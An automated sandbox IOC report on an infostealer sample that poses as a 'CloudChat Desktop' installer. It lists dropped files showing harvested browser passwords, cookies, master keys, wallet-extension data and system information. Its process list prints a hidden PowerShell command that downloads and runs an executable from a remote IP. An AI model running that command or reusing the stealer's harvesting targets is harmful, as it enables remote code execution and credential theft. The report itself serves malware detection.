IOC Report
LIccs3x2LZ.exe

loading gif

Files

File Path
Type
Category
Malicious
LIccs3x2LZ.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
C:\Users\user\AppData\Local\Temp\_MEI71322\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_ARC4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_chacha20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_pkcs1_decode.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_arc2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_blowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cast.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_des.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_des3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_BLAKE2b.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_RIPEMD160.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA224.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA384.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA512.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_keccak.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_poly1305.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Math\_modexp.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ec_ws.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ed25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ed448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_x25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\VCRUNTIME140_1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\python38.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\pywin32_system32\pywintypes38.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\win32\win32crypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\Updater.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\dbghelp.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-7GS9C.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-BG1K1.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-CGK3C.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-TSCLB.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Chrome_cookies.json
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Chrome_passwords.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Local State
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\MasterKey
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Cookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\LOG.old
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Edge_passwords.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Local State
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\MasterKey
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\addons.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\cookies.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\key4.db
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\permissions.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, file counter 3, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\places.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_books.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_history.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_passwords.txt
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\Credentials.json
Unicode text, UTF-8 (with BOM) text, with very long lines (13580), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\DNSCache.json
Unicode text, UTF-8 (with BOM) text, with very long lines (1498), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\IP.json
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\InstalledApp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\Process.json
Unicode text, UTF-8 (with BOM) text, with very long lines (48002), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\ScreenShot0.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\SystemInfo.json
Unicode text, UTF-8 (with BOM) text, with very long lines (5423), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserFiles.json
Unicode text, UTF-8 (with BOM) text, with very long lines (2058), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserSOFTWARE.reg
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UsersInfo.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\REG7885.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\_MEI71322\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI71322\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0s4m5y5.5km.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulbepvej.vef.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-L4TEK.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\tmp6E83.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp6FEB.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp727D.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp72BC.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp730B.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp731C.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp733C.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp74E3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\Updater.dat (copy)
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C\map0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\F52BD5F9617612C60
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_2
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_3
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_4
DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, minimum point enabled, calibration: offset 0.000000, slope 0.003786
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_2
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_3
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_4
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\settings0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\settings1
data
modified
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\shortcuts-custom.json
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\shortcuts-default.json
ASCII text
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\usertag
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-8PQGO.tmp
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\log.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\log_start0.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\unins000.dat
InnoSetup Log CloudChat Desktop {53F49750-6666-4FBF-9CA8-7A333C87D1ED}, version 0x418, 5773 bytes, 632922\37\user\37, C:\Users\user\AppData\Roaming\CloudChat
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CloudChat Desktop\CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:26 2024, mtime=Mon Sep 30 09:20:28 2024, atime=Fri Jun 24 01:27:42 2022, length=51122176, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CloudChat Desktop\Uninstall CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:25 2024, mtime=Mon Sep 30 09:20:25 2024, atime=Mon Sep 30 09:20:09 2024, length=3416125, window=hide
dropped
C:\Users\user\Desktop\CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:26 2024, mtime=Mon Sep 30 09:20:30 2024, atime=Fri Jun 24 01:27:42 2022, length=51122176, window=hide
dropped
There are 150 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\LIccs3x2LZ.exe
"C:\Users\user\Desktop\LIccs3x2LZ.exe"
 malicious
C:\Users\user\Desktop\LIccs3x2LZ.exe
"C:\Users\user\Desktop\LIccs3x2LZ.exe"
 malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe
"C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "$machineName = $env:COMPUTERNAME; $path = Join-Path -Path $env:TEMP -ChildPath 'GUIDGUIDGUID.exe'; $uri = 'http://185.196.10.235:50001/download?name=' + $machineName; Invoke-WebRequest -Uri $uri -OutFile $path; Start-process $path"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "start cmd.exe /K C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe"
C:\Windows\System32\cmd.exe
cmd.exe /K C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe
C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe
C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp
"C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp" /SL5="$4046E,22570383,901632,C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe"
C:\Windows\SysWOW64\reg.exe
"reg" EXPORT "HKEY_CURRENT_USER\SOFTWARE" "C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserSOFTWARE.reg" /y
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
